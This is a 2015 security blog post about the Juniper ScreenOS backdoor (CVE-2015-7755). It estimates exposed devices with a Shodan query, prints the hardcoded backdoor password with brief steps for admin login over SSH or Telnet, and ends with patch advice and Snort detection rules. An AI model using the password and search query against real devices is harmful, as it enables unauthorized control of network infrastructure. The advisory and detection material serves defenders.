Juniper Networks is a multinational corporation headquartered in Sunnyvale, California that develops and markets networking products. Its products include routers, switches, network management software, network security products and software-defined networking technology.
On 18th December 2015 a critical vulnerability (CVE-2015-7755) affecting ScreenOS 6.3.0r17 through 6.3.0r20 was disclosed. The impact is huge because many routers and switches are powered by Juniper ScreenOS. This vulnerability allows remote attackers to obtain administrative access by entering an unspecified password during a (1) SSH or (2) TELNET session.
HOW MANY DEVICES ARE POTENTIALLY AFFECTED?
In order to discover this we can use a IoT search engine like Shodan or Censys. In this article I’ll use Shodan to show you how a simple query netscreen product:”NetScreen sshd” currently exposes 27,659 devices.
Juniper Networks is a US company so it is not suprising to see the USA as the most affected country but as you can see this technology is used worldwide so we can state that this vulnerability literally broke the internet.
Analysing this statistics we can see that some major telecommunication companies (ISP) are affected, this means that potentially anyone who uses their services could be at risk. Now while this is scary, I expect ISPs to have already fixed the issue, but there will still be thousands of vulnerable devices at this time.
HOW TO EXPLOIT THE VULNERABILITY
If you have got a vulnerable system you can connect to it via SSH or Telnet if you know a valid username. Usernames can be guessed or found via dictionary or bruteforce attacks if no efficient security measures are in place.
Once you have got the username you simply need to insert the magic password: <<< %s(un=’%s’) = %u …and you are in.
The password was created in a way to be hard to read and to be disguised as a debug code, but it is clearly inspired by a book called “The Art of War” written by Sun Tzu. That’s a particular detail and obviously it was choosen intentionally, so you may ask…….
WHO IS BEHIND THIS BACKDOOR?
There are many speculations over this, obviously it must be someone who can have access to the Juniper Networks codebase. It could be Juniper Networks itself, an unknown hacker or hacking group, or a Government.
HOW TO FIX THE VULNERABILITY
The best thing to do in this case is to simply update to ScreenOS 6.2.0r19, 6.3.0r21 and later releases. You can download the firmware from here: http://www.juniper.net/support/downloads/screenos.html .
SNORT IDS rules are also available:
# Signatures to detect successful abuse of the Juniper backdoor password over telnet.
# Additionally a signature for detecting world reachable ScreenOS devices over SSH.
alert tcp $HOME_NET 23 -> any any (msg:”FOX-SRT – Flowbit – Juniper ScreenOS telnet (noalert)”; flow:established,to_client; content:”Remote Management Console|0d0a|”; offset:0; depth:27; flowbits:set,fox.juniper.screenos; flowbits:noalert; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; sid:21001729; rev:2;)
alert tcp any any -> $HOME_NET 23 (msg:”FOX-SRT – Backdoor – Juniper ScreenOS telnet backdoor password attempt”; flow:established,to_server; flowbits:isset,fox.juniper.screenos; flowbits:set,fox.juniper.screenos.password; content:”|3c3c3c20257328756e3d2725732729203d202575|”; offset:0; fast_pattern; classtype:attempted-admin; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; sid:21001730; rev:2;)
alert tcp $HOME_NET 23 -> any any (msg:”FOX-SRT – Backdoor – Juniper ScreenOS successful logon”; flow:established,to_client; flowbits:isset,fox.juniper.screenos.password; content:”-> “; isdataat:!1,relative; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:successful-admin; sid:21001731; rev:1;)
alert tcp $HOME_NET 22 -> $EXTERNAL_NET any (msg:”FOX-SRT – Policy – Juniper ScreenOS SSH world reachable”; flow:to_client,established; content:”SSH-2.0-NetScreen”; offset:0; depth:17; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; priority:1; sid:21001728; rev:1;)
Note that if you have NetScreen devices running on a non default telnet port, you will need to change port 23 to that specific port or to any.
If you are curious about this vulnerability the unpacked firmwares of the affected versions are available for download.
Author: Fabio Baroni Date: 2015-12-21 15:17:37